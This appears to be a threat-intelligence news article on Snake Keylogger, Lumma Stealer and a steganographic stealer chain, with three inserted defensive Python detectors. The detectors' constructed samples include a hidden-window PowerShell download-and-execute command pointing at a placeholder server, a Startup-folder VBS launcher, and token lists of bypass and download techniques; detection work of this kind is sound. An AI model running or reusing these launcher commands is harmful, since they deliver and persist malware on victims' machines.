A new variant of the Snake Keylogger malware is being used to actively target Windows users located in China, Turkey, Indonesia, Taiwan, and Spain.
Fortinet FortiGuard Labs says the new version has been behind over 280 million blocked infection attempts worldwide since the start of the year.
"Typically delivered through phishing emails containing malicious attachments or links, Snake Keylogger is designed to steal sensitive information from popular web browsers like Chrome, Edge, and Firefox by logging keystrokes, capturing credentials, and monitoring the clipboard," security researcher Kevin Su said.
Its other features allow it to exfiltrate the stolen data to an attacker-controlled server using the Simple Mail Transfer Protocol (SMTP) and Telegram bots, giving the threat actors access to the stolen credentials and other sensitive information.
The most notable aspect of the latest set of attacks is the use of AutoIt scripting to deliver and execute the main payload. The executable containing the malware is an AutoIt-compiled binary, which helps it bypass traditional detection mechanisms.
The use of AutoIt enables dynamic behavior that mimics benign automation tools, and it complicates static analysis by embedding the payload within the compiled script, Su added.
Once launched, Snake Keylogger drops a copy of itself to a file named "ageless.exe" in the folder "%Local_AppData%\supergroup". It also drops a file called "ageless.vbs" in the Windows Startup folder so that every time the system reboots, the Visual Basic Script (VBS) automatically launches the malware.
This persistence mechanism lets Snake Keylogger resume its malicious activity even after the associated process is terminated.
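As an added example (not code from the article or from FortiGuard Labs' analysis), the Python script below triages the persistence pattern described above: it lists script files in the Windows Startup folders and flags any that call Run/Exec on a target under the user's local AppData tree, which is where the dropped copy lives. The folder paths, regular expressions and sample script text are assumptions constructed for this example, not indicators from the report.

```python
"""Added example (not code from the article or FortiGuard Labs): triage
Startup-folder scripts for the persistence pattern described above, i.e. a
.vbs in the Startup folder that launches an executable dropped under the
user's local AppData tree (%LocalAppData%\\supergroup\\ageless.exe)."""
import os
import re
from pathlib import Path

# Script types the Windows shell will run from a Startup folder at logon.
SCRIPT_EXTENSIONS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".bat", ".cmd", ".ps1"}

# Heuristics (assumptions for this example, not signatures from the report).
WSCRIPT_SHELL = re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"\s*\)', re.IGNORECASE)
RUN_CALL = re.compile(r"\.(Run|Exec)\b", re.IGNORECASE)
EXE_NAME = re.compile(r"([\w\-]+\.exe)\b", re.IGNORECASE)
LOCAL_APPDATA = re.compile(r"%LOCALAPPDATA%|\\AppData\\Local\\", re.IGNORECASE)


def startup_folders():
    """Per-user and all-users Startup folders that exist on this host (Windows only)."""
    candidates = []
    if os.environ.get("APPDATA"):
        candidates.append(Path(os.environ["APPDATA"], "Microsoft", "Windows",
                               "Start Menu", "Programs", "Startup"))
    if os.environ.get("PROGRAMDATA"):
        candidates.append(Path(os.environ["PROGRAMDATA"], "Microsoft", "Windows",
                               "Start Menu", "Programs", "StartUp"))
    return [p for p in candidates if p.is_dir()]


def analyze_script(text):
    """Return (suspicious, findings, executables) for one script's contents.

    A script is treated as suspicious when it both launches something and
    points that launch at the user-writable local AppData tree."""
    findings = []
    if WSCRIPT_SHELL.search(text):
        findings.append("creates a WScript.Shell object")
    launches = bool(RUN_CALL.search(text))
    if launches:
        findings.append("calls Run/Exec")
    executables = sorted({m.lower() for m in EXE_NAME.findall(text)})
    if executables:
        findings.append("references executable(s): " + ", ".join(executables))
    in_local_appdata = bool(LOCAL_APPDATA.search(text))
    if in_local_appdata:
        findings.append("launch target lives under the user's local AppData tree")
    return launches and in_local_appdata, findings, executables


def scan_startup_folders():
    """Analyze every script in the Startup folders; returns {path: analysis}."""
    results = {}
    for folder in startup_folders():
        for path in folder.iterdir():
            if path.suffix.lower() in SCRIPT_EXTENSIONS:
                results[str(path)] = analyze_script(path.read_text(errors="replace"))
    return results


# Constructed sample mimicking the described launcher (not a captured file).
SAMPLE_VBS = (
    'Set sh = CreateObject("WScript.Shell")\r\n'
    'sh.Run """" & sh.ExpandEnvironmentStrings("%LOCALAPPDATA%") '
    '& "\\supergroup\\ageless.exe""", 0, False\r\n'
)
# Constructed benign launcher: runs a vendor tool from Program Files.
BENIGN_VBS = (
    'Set sh = CreateObject("WScript.Shell")\r\n'
    'sh.Run """C:\\Program Files\\Vendor\\sync.exe""", 1, False\r\n'
)

if __name__ == "__main__":
    for name, text in (("sample", SAMPLE_VBS), ("benign", BENIGN_VBS)):
        suspicious, findings, _ = analyze_script(text)
        print(f"{name}: suspicious={suspicious}; " + "; ".join(findings))
    for path, (suspicious, findings, _) in scan_startup_folders().items():
        print(f"{path}: suspicious={suspicious}; " + "; ".join(findings))
```

On a non-Windows host the folder scan returns nothing and only the constructed samples are evaluated; the heuristics are deliberately coarse and meant as a starting point for a hunt, not as a detection signature.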
The attack chain culminates with the injection of the main payload into a legitimate .NET process such as "regsvcs.exe" using a technique called process hollowing, "allowing the malware to hide its location within a trusted process and avoid detection," Su said.
The keylogger has also been observed using sites like checkip.dyndns[.]org to retrieve the victim's IP address and geolocation.
"To capture keystrokes, it leverages the SetWindowsHookEx API with the first parameter set to WH_KEYBOARD_LL (flag 13), a low-level keyboard hook that monitors keystrokes," Su said. "This method enables the malware to log sensitive data, such as banking credentials."
The development comes as CloudSEK exposed a campaign distributing malicious LNK files disguised as PDF documents to ultimately deploy Lumma Stealer, abusing compromised infrastructure associated with educational institutions.
The activity, which targets industries such as finance, healthcare, technology, and media, is a multi-stage attack sequence that results in the theft of passwords, browser data, and cryptocurrency wallets.
The campaign's primary infection vector is the use of malicious LNK (shortcut) files designed to appear as legitimate PDF documents, security researcher Mayank Sahariya said. The files are hosted on a WebDAV server, to which unsuspecting visitors are redirected after visiting compromised websites.
For its part, the LNK file runs a PowerShell command that connects to a remote server and retrieves the next-stage malware, an obfuscated JavaScript that contains another PowerShell script, which downloads Lumma Stealer from the same server and executes it.
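As an added example of how to triage the shortcuts described in this campaign (this is not code from the article or from CloudSEK), the Python below parses the fixed header and StringData section of a Windows Shell Link (.lnk) file per the MS-SHLLINK layout and flags the traits of a document-masquerading launcher: a script-interpreter target, hidden-window and download fragments in the arguments, a remote or WebDAV location, and an icon borrowed from a PDF viewer. The sample shortcuts are built in the block itself, the heuristic token list is an assumption, and the 198.51.100.7 address is an RFC 5737 documentation address, not a real server.

```python
"""Added example (not code from the article or from CloudSEK): parse the
header and StringData of a Windows Shell Link (.lnk) and flag the traits of
the PDF-masquerading, PowerShell-launching shortcuts described above.
Sample shortcuts are constructed here, not captured from the campaign."""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript", "rundll32")
# Command-line fragments worth a second look (assumed heuristics, not IOCs).
SUSPICIOUS_TOKENS = ("-w hidden", "-windowstyle hidden", "-ep bypass",
                     "-executionpolicy bypass", "-enc", "-encodedcommand", "iex",
                     "invoke-expression", "downloadstring", "downloadfile",
                     "invoke-webrequest", "iwr ", "bitsadmin", "certutil")


def parse_lnk(data):
    """Return ShowCommand plus the StringData fields of a .lnk as a dict."""
    if len(data) < 0x4C or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    offset = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:           # IDListSize + ItemIDList
        offset += 2 + struct.unpack_from("<H", data, offset)[0]
    if flags & HAS_LINK_INFO:                     # LinkInfoSize covers the whole struct
        offset += struct.unpack_from("<I", data, offset)[0]
    fields = {"flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    for flag, name in STRING_FIELDS:              # fixed order per MS-SHLLINK
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, offset)[0]
        offset += 2
        if flags & IS_UNICODE:
            fields[name] = data[offset:offset + 2 * count].decode("utf-16-le")
            offset += 2 * count
        else:
            fields[name] = data[offset:offset + count].decode("cp1252", errors="replace")
            offset += count
    return fields


def triage_lnk(fields):
    """Return the reasons a parsed shortcut looks like a document-masquerading launcher."""
    reasons = []
    target = fields.get("relative_path", "").lower()
    args = fields.get("arguments", "").lower()
    icon = fields.get("icon_location", "").lower()
    if any(i in target for i in INTERPRETERS):
        reasons.append("target is a script interpreter: " + fields["relative_path"])
    hits = [t for t in SUSPICIOUS_TOKENS if t in args]
    if hits:
        reasons.append("arguments contain " + ", ".join(hits))
    if re.search(r"https?://|\\\\[\w.\-]+(@ssl)?(@\d+)?\\|davwwwroot", args):
        reasons.append("arguments reference a remote or WebDAV location")
    if fields.get("show_command") == 7:           # SW_SHOWMINNOACTIVE: starts minimized
        reasons.append("window starts minimized")
    if "acrord" in icon or "acrobat" in icon or icon.endswith(".pdf"):
        reasons.append("icon borrowed from a PDF viewer")
    return reasons


def build_lnk(relative_path, arguments, icon_location, show_command=1):
    """Build a minimal .lnk carrying only StringData (enough to exercise the parser)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def string_data(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments) + string_data(icon_location)


# Constructed lure modelled on the described chain (198.51.100.7 is a documentation address).
LURE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-w hidden -ep bypass -c \"iex (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2.js')\"",
    r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe",
    show_command=7,
)
# Constructed benign shortcut for comparison.
BENIGN_LNK = build_lnk(r"..\..\..\Windows\notepad.exe", "readme.txt",
                       r"%SystemRoot%\system32\notepad.exe")

if __name__ == "__main__":
    for label, blob in (("lure", LURE_LNK), ("benign", BENIGN_LNK)):
        print(label, triage_lnk(parse_lnk(blob)))
```

The parser deliberately skips the LinkTargetIDList and LinkInfo structures by their declared sizes rather than interpreting them, which is all that is needed to reach the command line; for a real sample, compare the parsed target against the icon and file name, since the mismatch is the whole trick.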
Stealer malware has also been observed in recent weeks siphoning a variety of sensitive data from compromised Windows systems and exfiltrating it to a Telegram bot operated by the attacker.
The attack begins with an obfuscated JavaScript file that retrieves encoded strings from an open-source service in order to execute a PowerShell script, according to Cyfirma.
The script then downloads a JPG image and a text file from an IP address and a URL shortener, both of which contain malicious MZ (DOS executable) payloads embedded using steganographic techniques. Once executed, these payloads deploy the stealer malware.
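As an added example (not code from the article or from Cyfirma), the Python below carves Windows executables hidden inside files that pose as images or text, as in the chain just described. It validates each "MZ" candidate by following the e_lfanew pointer to a "PE\0\0" signature so stray "MZ" bytes are not reported, reports whatever trails a JPEG's End-Of-Image marker, and also decodes long base64 runs before carving, which generalizes beyond the article since stagers frequently store the payload encoded rather than raw. The carrier files and the payload stub are constructed inside the block; nothing here is a captured sample.

```python
"""Added example (not code from the article or from Cyfirma): carve Windows
executables hidden in files that pose as images or text, as in the chain
above. Raw MZ headers are verified via e_lfanew -> "PE\\0\\0"; base64 runs are
decoded and carved too (a generalization assumed for this example)."""
import base64
import binascii
import re
import struct

B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")
MACHINES = {0x14C: "x86", 0x8664: "x64", 0x1C0: "ARM", 0xAA64: "ARM64"}


def carve_pe(blob):
    """Return one dict per plausible PE image embedded anywhere in blob."""
    hits = []
    idx = blob.find(b"MZ")
    while idx >= 0:
        if idx + 0x40 <= len(blob):
            e_lfanew = struct.unpack_from("<I", blob, idx + 0x3C)[0]
            pe = idx + e_lfanew
            # e_lfanew must skip the 64-byte DOS header and land on "PE\0\0".
            if 0x40 <= e_lfanew < 0x1000 and blob[pe:pe + 4] == b"PE\0\0":
                machine = struct.unpack_from("<H", blob, pe + 4)[0] if pe + 6 <= len(blob) else 0
                hits.append({"offset": idx, "e_lfanew": e_lfanew, "machine": machine,
                             "arch": MACHINES.get(machine, hex(machine))})
        idx = blob.find(b"MZ", idx + 1)
    return hits


def carve_base64_pe(blob):
    """Decode long base64 runs and carve each; adds the run's own offset."""
    hits = []
    for m in B64_RUN.finditer(blob):
        try:
            decoded = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        for hit in carve_pe(decoded):
            hits.append(dict(hit, container_offset=m.start(), encoding="base64"))
    return hits


def jpeg_trailer(blob):
    """Bytes appended after the first JPEG End-Of-Image marker (b"" if none).

    Entropy-coded data never contains FF D9, but an EXIF thumbnail can, so
    treat a non-empty trailer as a hint to carve, not as proof on its own."""
    if not blob.startswith(b"\xff\xd8\xff"):
        return b""
    eoi = blob.find(b"\xff\xd9")
    return blob[eoi + 2:] if eoi >= 0 else b""


def build_fake_pe(machine=0x14C):
    """Minimal DOS header + PE signature + start of FileHeader; not runnable."""
    dos = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x80)   # e_lfanew = 0x80
    dos += b"\x00" * (0x80 - len(dos))
    return dos + b"PE\0\0" + struct.pack("<H", machine) + b"\x00" * 18


# Constructed carriers (not captured samples): a stub JPEG with the payload
# appended after EOI, and a text file with the same payload base64-encoded.
FAKE_PE = build_fake_pe()
FAKE_JPEG_PREFIX = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 10 + b"\xff\xd9"
FAKE_JPEG = FAKE_JPEG_PREFIX + FAKE_PE
FAKE_TEXT = b"nothing to see here\n" + base64.b64encode(FAKE_PE) + b"\n"

if __name__ == "__main__":
    print("jpeg trailer bytes:", len(jpeg_trailer(FAKE_JPEG)))
    print("raw PE hits:", carve_pe(FAKE_JPEG))
    print("base64 PE hits:", carve_base64_pe(FAKE_TEXT))
```

Run the two carvers over any downloaded "image" or "text" the PowerShell stage fetched; a real JPEG with a non-empty trailer or a text file whose decoded base64 yields a PE header is enough to pull the payload for sandboxing without executing the stager.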